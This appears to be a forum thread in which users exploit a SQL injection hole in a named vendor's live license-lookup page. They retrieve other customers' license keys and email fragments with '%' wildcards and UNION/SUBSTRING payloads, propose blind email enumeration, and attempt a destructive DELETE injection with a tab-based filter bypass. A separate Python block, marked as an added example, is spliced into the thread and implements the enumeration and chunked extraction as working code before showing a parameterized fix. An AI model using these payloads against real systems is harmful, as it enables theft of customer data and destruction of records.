Easily hacked...
-
http://fixtunes.com/purchasecode.php
You can enter your email address on this form to retrieve the license you purchased. I thought, at first, it was a little insecure because you don't need any information besides an email address.
As it turns out, you don't even need that. The text gets used in a SQL query using the LIKE operator, so a percent sign will work just as well!
-
That's horrible. I also don't like the idea that someone can pull up my product key just by knowing my email address.
-
I also like that it limits the entry to 30 characters. My email address is 28 chars, and it's not even that long of a company name on the end :/
-
Presumably you could extract email addresses from this.
Check for a key for %@aol.com. Then %z@aol.com, yes, %zz@aol.com, no, %yz@aol.com, yes, %zyz@aol.com, no, %yyz@aol.com, no, %xyz@aol.com, yes. Etc.
-
@joe.edwards@imaginuity.com said:
Presumably you could extract email addresses from this.
Check for a key for %@aol.com. Then %z@aol.com, yes, %zz@aol.com, no, %yz@aol.com, yes, %zyz@aol.com, no, %yyz@aol.com, no, %xyz@aol.com, yes. Etc.
plz send codez
-
@skippy said:
I also like that it limits the entry to 30 characters. My email address is 28 chars, and it's not even that long of a company name on the end :/
Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.
-
@medialint said:
@skippy said:
I also like that it limits the entry to 30 characters. My email address is 28 chars, and it's not even that long of a company name on the end :/
Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.
I suppose the wildcards are there so you can work around the character length restriction.
-
Bad query:
- Error #: 1064
- Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';deletefromd_purchases#' limit 0,1' at line 1
- Query: select ItemId from d_Purchases where Email like '';deletefromd_purchases#' limit 0,1
They do seem to remove all spaces from your input.... Anyone know how to get around that?
-
@MasterPlanSoftware said:
Bad query:
- Error #: 1064
- Error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';deletefromd_purchases#' limit 0,1' at line 1
- Query: select ItemId from d_Purchases where Email like '';deletefromd_purchases#' limit 0,1
They do seem to remove all spaces from your input.... Anyone know how to get around that?
Use a different kind of whitespace? Like a tab character.
That said... Please don't delete their data. Somehow I doubt they're following proper backup procedures.
-
@joe.edwards@imaginuity.com said:
Use a different kind of whitespace? Like a tab character.
Hmm good idea, I don't know why that didn't occur to me.... so easy to miss the obvious sometimes.
-
@MasterPlanSoftware said:
@joe.edwards@imaginuity.com said:
Use a different kind of whitespace? Like a tab character.
Hmm good idea, I don't know why that didn't occur to me.... so easy to miss the obvious sometimes.
The tab character works, but it'll only run a single query.
-
abc' union select Email from d_Purchases where Email like 'a%
-
Interesting...
Purchase Code: afes-sler-@c
-
Good to know that Mr. Fessler's code is AAA5-4E26-K9
-
So I guess you can extract data in chunks with substring commands, knowing they're going to format any string like a license key.
-
@joe.edwards@imaginuity.com said:
abc' union select Email from d_Purchases where Email like 'a%
And then:
abc' union select SUBSTRING(Email FROM 9) from d_Purchases where Email like 'a%
-
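An added example, not code from this thread or from fixtunes.com: a Python model of the purchasecode.php lookup as the posts above describe it (input spliced into a LIKE clause, spaces stripped, the first column of the first row shown as an XXXX-XXXX-XX key), backed by an in-memory SQLite table so it runs offline. It works through both extraction routes discussed here, the right-to-left `%z@aol.com` yes/no enumeration and the `abc' union select ... SUBSTRING` chunked dump with tabs in place of the stripped spaces, and ends with the parameterized equality lookup that closes both. The table and column names follow the thread; the rows, the exact space-stripping filter, the key formatter, and `substr(Email, offset, 10)` (SQLite's spelling of the page's MySQL `SUBSTRING`) are assumptions.

```python
import sqlite3

# Constructed sample rows; not real customers or keys. The third address is
# 35 characters long, past the 30-character form field complained about above
# (that client-side limit is not modelled here). ItemId is stored raw and
# formatted on output, matching the 4-4-2 display seen in the thread.
SAMPLE_ROWS = [
    ("xyz@aol.com", "AAAABBBBCC"),
    ("kim@aol.com", "DDDDEEEEFF"),
    ("dan-o.long.mailbox.name@example.com", "GGGGHHHHII"),
]

_db = sqlite3.connect(":memory:")
_db.execute("create table d_Purchases (Email text, ItemId text)")
_db.executemany("insert into d_Purchases values (?, ?)", SAMPLE_ROWS)


def format_key(raw):
    """Assumed display formatter: first 10 characters rendered as XXXX-XXXX-XX."""
    chunks = [raw[0:4], raw[4:8], raw[8:10]]
    return "-".join(c for c in chunks if c)


def unformat_key(shown):
    """Inverse of format_key: the inserted separators sit at offsets 4 and 9,
    so only those positions are dropped and real hyphens in the data survive."""
    return "".join(ch for i, ch in enumerate(shown) if i not in (4, 9))


def vulnerable_lookup(text):
    """The handler as the thread describes it. Returns None when no row
    matches; raises sqlite3.OperationalError on a syntax error, like the
    verbose MySQL error page quoted above."""
    text = text.replace(" ", "")  # the observed filter: only plain spaces go
    query = f"select ItemId from d_Purchases where Email like '{text}' limit 0,1"
    row = _db.execute(query).fetchone()
    return format_key(row[0]) if row else None


def injection_survives_filter(payload):
    """True if the payload still parses after the handler strips spaces."""
    try:
        vulnerable_lookup(payload)
        return True
    except sqlite3.OperationalError:
        return False


def enumerate_by_suffix(domain, alphabet="abcdefghijklmnopqrstuvwxyz0123456789.-"):
    """Blind enumeration of every address ending in @domain, built right to
    left from the yes/no answer to '%<c><known>@domain' (the probing sequence
    posted above). '_' is omitted from the alphabet: it is a LIKE wildcard."""
    found = []

    def extend(known):
        if vulnerable_lookup(f"{known}@{domain}") is not None:  # exact hit
            found.append(f"{known}@{domain}")
        for c in alphabet:  # every matching branch is followed, so shared suffixes work
            if vulnerable_lookup(f"%{c}{known}@{domain}") is not None:
                extend(c + known)

    extend("")
    return sorted(found)


def dump_first_match(pattern, chunk=10):
    """UNION-based extraction through the 12-character key display. Tabs stand
    in for the stripped spaces; each response yields one 10-character chunk."""
    out, offset = "", 1
    while True:
        payload = (
            f"abc'\tunion\tselect\tsubstr(Email,{offset},{chunk})"
            f"\tfrom\td_Purchases\twhere\tEmail\tlike\t'{pattern}"
        )
        shown = vulnerable_lookup(payload)
        piece = unformat_key(shown) if shown else ""
        out += piece
        if len(piece) < chunk:  # a short (or empty) chunk means the value is exhausted
            return out
        offset += chunk


def safe_lookup(email):
    """The fix: a bound parameter ends the injection, and an equality test
    (not LIKE) makes '%' and '_' in the input ordinary characters."""
    row = _db.execute(
        "select ItemId from d_Purchases where Email = ? limit 1", (email,)
    ).fetchone()
    return format_key(row[0]) if row else None


if __name__ == "__main__":
    print(vulnerable_lookup("%"))             # any customer's key, as in the first post
    print(enumerate_by_suffix("aol.com"))
    print(dump_first_match("dan%"))
    print(injection_survives_filter("abc' union select Email from d_Purchases where Email like 'a%"))
    print(safe_lookup("%"))                   # None: the wildcard is just a character now
```

Parameterizing alone is not enough for this form: `Email like ?` with `%` bound as the value still returns the first row, which is the very first complaint in the thread. Either compare with `=` as above or escape `%` and `_` and add an `ESCAPE` clause.
-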
@MasterPlanSoftware said:
They do seem to remove all spaces from your input.... Anyone know how to get around that?
- %20?
- Don't bother?
- Alt-0160?
In a random order. I suggest #2.
-
@PJH said:
@MasterPlanSoftware said:
They do seem to remove all spaces from your input.... Anyone know how to get around that?
- %20?
- Don't bother?
- Alt-0160?
In a random order. I suggest #2.
Yeah, already solved. Thanks for your helpfulness...
-
@medialint said:
Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.
I worked at a data management company... We had to make our e-mail database fields length 100... length 50 would clobber around 30% of the addresses in our database. Some people's e-mail address is way too long.
-
@Heron said:
@medialint said:
Yikes. 30? I happened to have a DB with about 20,000 records with e-mail handy and the @mycompany.com part is 15 including the @ and .com. About 25% of the e-mail addresses are longer than 30.
I worked at a data management company... We had to make our e-mail database fields length 100... length 50 would clobber around 30% of the addresses in our database. Some people's e-mail address is way too long.
Is there any actual limit on email address lengths?
-
The part before the @ should be no longer than 64 characters while the domain name can be up to 255 characters, then add the @ and you have a maximum of 320 characters. However, the 64 character local-part limit isn't enforced and you can go longer.
-
So something like " OR 1=1 ORDER BY RAND(); -- would get you a random license? :D
There's a similar hole on the LimeWire Pro site as well... :)
-
They appear to have fixed it. I now get "Error" when I put in %.
-
@Jonathan Holland said:
They appear to have fixed it. I now get "Error" when I put in %.
Hurray for your efforts!
-
It's not really fixed. If you enter anything other than an email address then it shows the nice helpful "error." screen.